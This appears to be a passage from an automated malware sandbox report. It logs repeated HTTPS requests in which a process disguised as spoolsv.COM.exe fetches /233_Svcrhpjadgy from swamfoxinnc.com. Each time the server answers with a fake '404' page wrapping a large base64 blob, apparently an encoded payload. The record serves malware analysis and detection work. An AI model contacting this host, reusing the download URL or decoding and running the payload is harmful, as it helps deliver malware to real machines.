                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:37:52 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:37:52 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.1049735176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:37:54 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:37:55 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:37:55 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:37:55 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:37:55 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:37:56 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:37:56 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.1049744176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:37:57 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:37:59 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:37:58 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:37:59 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:37:59 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:37:59 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:37:59 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.1049756176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:38:01 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:38:02 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:38:02 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:38:02 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:38:02 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:38:02 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:38:03 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.1049763176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:38:04 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:38:06 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:38:05 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:38:06 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:38:06 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
